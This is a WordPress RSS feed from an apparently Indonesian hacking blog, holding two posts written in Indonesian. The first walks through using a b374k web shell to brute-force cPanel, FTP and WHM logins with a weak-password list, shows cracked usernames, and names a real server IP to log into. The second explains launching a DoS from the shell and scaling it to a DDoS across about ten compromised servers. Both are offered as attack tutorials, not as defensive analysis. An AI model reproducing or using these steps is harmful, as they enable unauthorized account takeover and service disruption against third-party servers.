<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>..::james0baster::..</title>
	<atom:link href="http://www.james0baster.web.id/v2/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.james0baster.web.id/v2</link>
	<description>..::Personal Site::..</description>
	<lastBuildDate>Wed, 03 Aug 2011 21:03:30 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='www.james0baster.web.id' port='80' path='/v2/?rsscloud=notify' registerProcedure='' protocol='http-post' />
		<item>
		<title>Bruteforce dengan shell</title>
		<link>http://www.james0baster.web.id/v2/bruteforce-dengan-shell/</link>
		<comments>http://www.james0baster.web.id/v2/bruteforce-dengan-shell/#comments</comments>
		<pubDate>Mon, 07 Feb 2011 07:45:23 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Jaringan Komputer]]></category>
		<category><![CDATA[Keamanan]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[Komputer]]></category>
		<category><![CDATA[Local]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Pemerograman]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=260</guid>
		<description><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2011/02/shoot.gif"><img class="size-full wp-image-264 alignleft" title="shoot" src="http://www.james0baster.web.id/v2/wp-content/uploads/2011/02/shoot.gif" alt="" width="108" height="68" /></a></p>
<p>sebetulnya teknik ini sama dengan <a href="http://www.james0baster.web.id/v2/2011/02/tutorial-buat-para-jumper/" target="_blank"><span style="color: #ff0000;">postingan itu</span></a></p>
<p>sama2 jumping <img title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /></p>
<p>buat ngebrote user dan password cpanel, ftp, ataupun whm</p>
<p>oke langsung aja yah <img title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /> :<span id="more-260"></span></p>
<p>1. <span style="color: #ff0000;"><a href="http://www.james0baster.web.id/v2/2011/02/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a> </span><br />
2. masukan passwordnya biar bisa akses shellnya</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" /></p>
<p>3. klik menu BruteForce<br />
4. isikan list password yg anda suka<br />
yg sering ane gunain</p>
<blockquote><p><cite><span style="color: #ff0000;">Password List :</span></cite></p></blockquote>
<blockquote><p><cite></cite>12345<br />
123456<br />
1234567<br />
12345678<br />
123456789<br />
1234567890</p></blockquote>
<p>nanti hasilnya kaya gini :</p>
<blockquote><p><cite><span style="color: #ff0000;">Hasilnya:</span></cite></p></blockquote>
<blockquote><p><cite></cite>[ james0baster@james0baster.web.id ]# Seraaaanngg &#8230;<br />
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = wonder dan passwordnya = 12345<br />
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = pond dan passwordnya = 12345</p></blockquote>
<p>coba login aja ke cpanelnya <img title="asik" src="http://devilzc0de.org/forum/images/smilies/asik.gif" border="0" alt="asik" /><br />
174.120.9.58/cpanel<br />
<img title="santai" src="http://devilzc0de.org/forum/images/smilies/santai.gif" border="0" alt="santai" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.james0baster.web.id/v2/wp-content/uploads/2011/02/shoot.gif"><img class="size-full wp-image-264 alignleft" title="shoot" src="http://www.james0baster.web.id/v2/wp-content/uploads/2011/02/shoot.gif" alt="" width="108" height="68" /></a></p>
<p>sebetulnya teknik ini sama dengan <a href="http://www.james0baster.web.id/v2/2011/02/tutorial-buat-para-jumper/" target="_blank"><span style="color: #ff0000;">postingan itu</span></a></p>
<p>sama2 jumping <img title="hore" src="http://devilzc0de.org/forum/images/smilies/hore.gif" border="0" alt="hore" /></p>
<p>buat ngebrote user dan password cpanel, ftp, ataupun whm</p>
<p>oke langsung aja yah <img title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /> :<span id="more-260"></span></p>
<p>1. <span style="color: #ff0000;"><a href="http://www.james0baster.web.id/v2/2011/02/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a> </span><br />
2. masukan passwordnya biar bisa akses shellnya</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" /></p>
<p>3. klik menu BruteForce<br />
4. isikan list password yg anda suka<br />
yg sering ane gunain</p>
<blockquote><p><cite><span style="color: #ff0000;">Password List :</span></cite></p></blockquote>
<blockquote><p><cite></cite>12345<br />
123456<br />
1234567<br />
12345678<br />
123456789<br />
1234567890</p></blockquote>
<p>nanti hasilnya kaya gini :</p>
<blockquote><p><cite><span style="color: #ff0000;">Hasilnya:</span></cite></p></blockquote>
<blockquote><p><cite></cite>[ james0baster@james0baster.web.id ]# Seraaaanngg &#8230;<br />
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = wonder dan passwordnya = 12345<br />
[ james0baster@james0baster.web.id ]# Serangan selesai , nihk username = pond dan passwordnya = 12345</p></blockquote>
<p>coba login aja ke cpanelnya <img title="asik" src="http://devilzc0de.org/forum/images/smilies/asik.gif" border="0" alt="asik" /><br />
174.120.9.58/cpanel<br />
<img title="santai" src="http://devilzc0de.org/forum/images/smilies/santai.gif" border="0" alt="santai" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;n=Bruteforce+dengan+shell&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/bruteforce-dengan-shell/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell&amp;desc=%0D%0A%0D%0Asebetulnya%20teknik%20ini%20sama%20dengan%20postingan%20itu%0D%0A%0D%0Asama2%20jumping%20%0D%0A%0D%0Abuat%20ngebrote%20user%20dan%20password%20cpanel%2C%20ftp%2C%20ataupun%20whm%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20BruteForce%0D%0A4.%20isikan%20list%20password%20y" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;t=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Bruteforce+dengan+shell&amp;body=Link: http://www.james0baster.web.id/v2/bruteforce-dengan-shell/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0Asebetulnya%20teknik%20ini%20sama%20dengan%20postingan%20itu%0D%0A%0D%0Asama2%20jumping%20%0D%0A%0D%0Abuat%20ngebrote%20user%20dan%20password%20cpanel%2C%20ftp%2C%20ataupun%20whm%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20BruteForce%0D%0A4.%20isikan%20list%20password%20y" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
			<a href="http://www.google.com/reader/link?url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell&amp;srcUrl=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;srcTitle=Bruteforce+dengan+shell&amp;snippet=%0D%0A%0D%0Asebetulnya%20teknik%20ini%20sama%20dengan%20postingan%20itu%0D%0A%0D%0Asama2%20jumping%20%0D%0A%0D%0Abuat%20ngebrote%20user%20dan%20password%20cpanel%2C%20ftp%2C%20ataupun%20whm%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20BruteForce%0D%0A4.%20isikan%20list%20password%20y" rel="nofollow" class="external" title="Add this to Google Reader">Add this to Google Reader</a>
		</li>
		<li class="shr-hackernews">
			<a href="http://news.ycombinator.com/submitlink?u=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;t=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Submit this to Hacker News">Submit this to Hacker News</a>
		</li>
		<li class="shr-hotmail">
			<a href="http://mail.live.com/?rru=compose?subject=Bruteforce+dengan+shell&amp;body=Link: http://www.james0baster.web.id/v2/bruteforce-dengan-shell/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0Asebetulnya%20teknik%20ini%20sama%20dengan%20postingan%20itu%0D%0A%0D%0Asama2%20jumping%20%0D%0A%0D%0Abuat%20ngebrote%20user%20dan%20password%20cpanel%2C%20ftp%2C%20ataupun%20whm%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20BruteForce%0D%0A4.%20isikan%20list%20password%20y" rel="nofollow" class="external" title="Email this via Hotmail">Email this via Hotmail</a>
		</li>
		<li class="shr-mail">
			<a href="mailto:?subject=%22Bruteforce%20dengan%20shell%22&amp;body=Link: http://www.james0baster.web.id/v2/bruteforce-dengan-shell/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0Asebetulnya%20teknik%20ini%20sama%20dengan%20postingan%20itu%0D%0A%0D%0Asama2%20jumping%20%0D%0A%0D%0Abuat%20ngebrote%20user%20dan%20password%20cpanel%2C%20ftp%2C%20ataupun%20whm%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20BruteForce%0D%0A4.%20isikan%20list%20password%20y" rel="nofollow" class="external" title="Email this to a friend?">Email this to a friend?</a>
		</li>
		<li class="shr-misterwong">
			<a href="http://www.mister-wong.com/addurl/?bm_url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;bm_description=Bruteforce+dengan+shell&amp;plugin=sexybookmarks" rel="nofollow" class="external" title="Add this to Mister Wong">Add this to Mister Wong</a>
		</li>
		<li class="shr-mixx">
			<a href="http://www.mixx.com/submit?page_url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Share this on Mixx">Share this on Mixx</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;t=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-plurk">
			<a href="http://www.plurk.com/m?content=Bruteforce+dengan+shell+-+http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;qualifier=shares" rel="nofollow" class="external" title="Share this on Plurk">Share this on Plurk</a>
		</li>
		<li class="shr-reddit">
			<a href="http://reddit.com/submit?url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Share this on Reddit">Share this on Reddit</a>
		</li>
		<li class="shr-stumbleupon">
			<a href="http://www.stumbleupon.com/submit?url=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;title=Bruteforce+dengan+shell" rel="nofollow" class="external" title="Stumble upon something good? Share it on StumbleUpon">Stumble upon something good? Share it on StumbleUpon</a>
		</li>
		<li class="shr-technorati">
			<a href="http://technorati.com/faves?add=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/" rel="nofollow" class="external" title="Share this on Technorati">Share this on Technorati</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Bruteforce+dengan+shell+-+http://bit.ly/dVnIiJ&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoobuzz">
			<a href="http://buzz.yahoo.com/submit/?submitUrl=http://www.james0baster.web.id/v2/bruteforce-dengan-shell/&amp;submitHeadline=Bruteforce+dengan+shell&amp;submitSummary=%0D%0A%0D%0Asebetulnya%20teknik%20ini%20sama%20dengan%20postingan%20itu%0D%0A%0D%0Asama2%20jumping%20%0D%0A%0D%0Abuat%20ngebrote%20user%20dan%20password%20cpanel%2C%20ftp%2C%20ataupun%20whm%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20BruteForce%0D%0A4.%20isikan%20list%20password%20y&amp;submitCategory=science&amp;submitAssetType=text" rel="nofollow" class="external" title="Buzz up!">Buzz up!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Bruteforce+dengan+shell&amp;body=Link: http://www.james0baster.web.id/v2/bruteforce-dengan-shell/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %0D%0A%0D%0Asebetulnya%20teknik%20ini%20sama%20dengan%20postingan%20itu%0D%0A%0D%0Asama2%20jumping%20%0D%0A%0D%0Abuat%20ngebrote%20user%20dan%20password%20cpanel%2C%20ftp%2C%20ataupun%20whm%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20BruteForce%0D%0A4.%20isikan%20list%20password%20y" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a class="wpptopdf" target="_blank" rel="noindex,nofollow" href="http://www.james0baster.web.id/v2/bruteforce-dengan-shell/?format=pdf" title="Download PDF">http://www.james0baster.web.id/v2/wp-content/plugins/wp-post-to-pdf/asset/images/pdf.png</a>]]></content:encoded>
			<wfw:commentRss>http://www.james0baster.web.id/v2/bruteforce-dengan-shell/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Tutorial Dos Attack untuk menjurus ke DDOS</title>
		<link>http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/</link>
		<comments>http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/#comments</comments>
		<pubDate>Mon, 07 Feb 2011 07:39:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[..::james0baster::..]]></category>
		<category><![CDATA[Berita dan Pengumuman]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Jaringan Komputer]]></category>
		<category><![CDATA[Keamanan]]></category>
		<category><![CDATA[Keamanan & Perbaikan WEB]]></category>
		<category><![CDATA[Komputer]]></category>
		<category><![CDATA[Local]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[Pemerograman]]></category>

		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=257</guid>
		<description><![CDATA[<p>kali ini ane mau buat tutor dos<br />
yah tau kan dos kalo belom tau bisa berkunjung ke<br />
<a href="http://id.wikipedia.org/wiki/Serangan_DoS" target="_blank"><span style="color: #ff0000;">http://id.wikipedia.org/wiki/Serangan_DoS</span></a></p>
<p>oke langsung aja yah <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /> :<span id="more-257"></span></p>
<p>1.<span style="color: #ff0000;"> <a href="http://www.james0baster.web.id/v2/2011/02/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a></span><span style="color: #ff0000;"> </span><br />
2. masukan passwordnya biar bisa akses shellnya</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" /></p>
<p>3. klik menu DOS<br />
akan menampilkan form seperti berikut :<br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1373.snc4/164525_188139351210410_100000430395530_569776_2031231_n.jpg" border="0" alt="[Image: 164525_188139351210410_100000430395530_5...1231_n.jpg]" /></p>
<p>4. isi fild &#8220;host&#8221;<br />
fild &#8220;host&#8221; bisa di isi dengan <span style="color: #ff0000;">domain </span>ataupun <span style="color: #ff0000;">ip target</span></p>
<p>5. isi fild &#8220;Length (seconds)&#8221;<br />
fild &#8220;Length (seconds)&#8221; di isi dengan <span style="color: #ff0000;">99999999999 </span>atau sebanyak2nya <img title="ngakak" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" border="0" alt="ngakak" /></p>
<p>6. coba ping ke domain atau ip target<br />
kalo belum rto berarti ga bisa di DOS <img title="seneng" src="http://devilzc0de.org/forum/images/smilies/penjahat.gif" border="0" alt="seneng" /><br />
coba serang dengan shell yg berada di server lain<br />
jadi serangannya <span style="color: #ff0000;">terdistribusi </span>atau sering disebut <span style="color: #ff0000;">DDOS </span><img title="maling" src="http://devilzc0de.org/forum/images/smilies/maling.gif" border="0" alt="maling" /><br />
yah bisa sampe 10 shell lah buat liat perubahan yang pasti <img title="cihuy" src="http://devilzc0de.org/forum/images/smilies/scary%20movie%20character.gif" border="0" alt="cihuy" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>



		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Digg this!
		
		
			Post this on Diigo
		
		
			Share this on Facebook
		
		
			Email this via Gmail
		
		
			Add this to Google Bookmarks
		
		
			Post on Google Buzz
		
		
			Add this to Google Reader
		
		
			Submit this to Hacker News
		
		
			Email this via Hotmail
		
		
			Email this to a friend?
		
		
			Add this to Mister Wong
		
		
			Share this on Mixx
		
		
			Post this to MySpace
		
		
			Share [...]]]></description>
			<content:encoded><![CDATA[<p>kali ini ane mau buat tutor dos<br />
yah tau kan dos kalo belom tau bisa berkunjung ke<br />
<a href="http://id.wikipedia.org/wiki/Serangan_DoS" target="_blank"><span style="color: #ff0000;">http://id.wikipedia.org/wiki/Serangan_DoS</span></a></p>
<p>oke langsung aja yah <img src='http://www.james0baster.web.id/v2/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' />  <img title="pinter" src="http://devilzc0de.org/forum/images/smilies/pinter.gif" border="0" alt="pinter" /> :<span id="more-257"></span></p>
<p>1.<span style="color: #ff0000;"> <a href="http://www.james0baster.web.id/v2/2011/02/ngedit-script-b374k/" target="_blank"><span style="color: #ff0000;">download shell yg ada di sini</span></a></span><span style="color: #ff0000;"> </span><br />
2. masukan passwordnya biar bisa akses shellnya</p>
<p><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-ash1/hs774.ash1/166409_188142117876800_100000430395530_569790_2489188_n.jpg" border="0" alt="[Image: 166409_188142117876800_100000430395530_5...9188_n.jpg]" /></p>
<p>3. klik menu DOS<br />
akan menampilkan form seperti berikut :<br />
<img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1373.snc4/164525_188139351210410_100000430395530_569776_2031231_n.jpg" border="0" alt="[Image: 164525_188139351210410_100000430395530_5...1231_n.jpg]" /></p>
<p>4. isi fild &#8220;host&#8221;<br />
fild &#8220;host&#8221; bisa di isi dengan <span style="color: #ff0000;">domain </span>ataupun <span style="color: #ff0000;">ip target</span></p>
<p>5. isi fild &#8220;Length (seconds)&#8221;<br />
fild &#8220;Length (seconds)&#8221; di isi dengan <span style="color: #ff0000;">99999999999 </span>atau sebanyak2nya <img title="ngakak" src="http://devilzc0de.org/forum/images/smilies/ngakak.gif" border="0" alt="ngakak" /></p>
<p>6. coba ping ke domain atau ip target<br />
kalo belum rto berarti ga bisa di DOS <img title="seneng" src="http://devilzc0de.org/forum/images/smilies/penjahat.gif" border="0" alt="seneng" /><br />
coba serang dengan shell yg berada di server lain<br />
jadi serangannya <span style="color: #ff0000;">terdistribusi </span>atau sering disebut <span style="color: #ff0000;">DDOS </span><img title="maling" src="http://devilzc0de.org/forum/images/smilies/maling.gif" border="0" alt="maling" /><br />
yah bisa sampe 10 shell lah buat liat perubahan yang pasti <img title="cihuy" src="http://devilzc0de.org/forum/images/smilies/scary%20movie%20character.gif" border="0" alt="cihuy" /></p>
<p class="facebook"><a href="http://www.facebook.com/share.php?u=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/" target="_blank" title="Share on Facebook">Share on Facebook</a></p>

<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-caring-old">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;n=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/feed" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-digg">
			<a href="http://digg.com/submit?phase=2&amp;url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Digg this!">Digg this!</a>
		</li>
		<li class="shr-diigo">
			<a href="http://www.diigo.com/post?url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;desc=kali%20ini%20ane%20mau%20buat%20tutor%20dos%0D%0Ayah%20tau%20kan%20dos%20kalo%20belom%20tau%20bisa%20berkunjung%20ke%0D%0Ahttp%3A%2F%2Fid.wikipedia.org%2Fwiki%2FSerangan_DoS%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%3AD%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20DOS%0D%0Aakan%20menampilkan%20form%20seperti%20ber" rel="nofollow" class="external" title="Post this on Diigo">Post this on Diigo</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;t=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-gmail">
			<a href="https://mail.google.com/mail/?ui=2&amp;view=cm&amp;fs=1&amp;tf=1&amp;su=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS&amp;body=Link: http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/ (sent via shareaholic)%0D%0A%0D%0A----%0D%0A kali%20ini%20ane%20mau%20buat%20tutor%20dos%0D%0Ayah%20tau%20kan%20dos%20kalo%20belom%20tau%20bisa%20berkunjung%20ke%0D%0Ahttp%3A%2F%2Fid.wikipedia.org%2Fwiki%2FSerangan_DoS%0D%0A%0D%0Aoke%20langsung%20aja%20yah%20%3AD%20%20%3A%0D%0A%0D%0A1.%20download%20shell%20yg%20ada%20di%20sini%20%0D%0A2.%20masukan%20passwordnya%20biar%20bisa%20akses%20shellnya%0D%0A%0D%0A%0D%0A%0D%0A3.%20klik%20menu%20DOS%0D%0Aakan%20menampilkan%20form%20seperti%20ber" rel="nofollow" class="external" title="Email this via Gmail">Email this via Gmail</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;title=Tutorial+Dos+Attack+untuk+menjurus+ke+DDOS" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://www.james0baster.web.id/v2/tutorial-dos-attack-untuk-menjurus-ke-ddos/&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
		<li class="shr-googlereader">
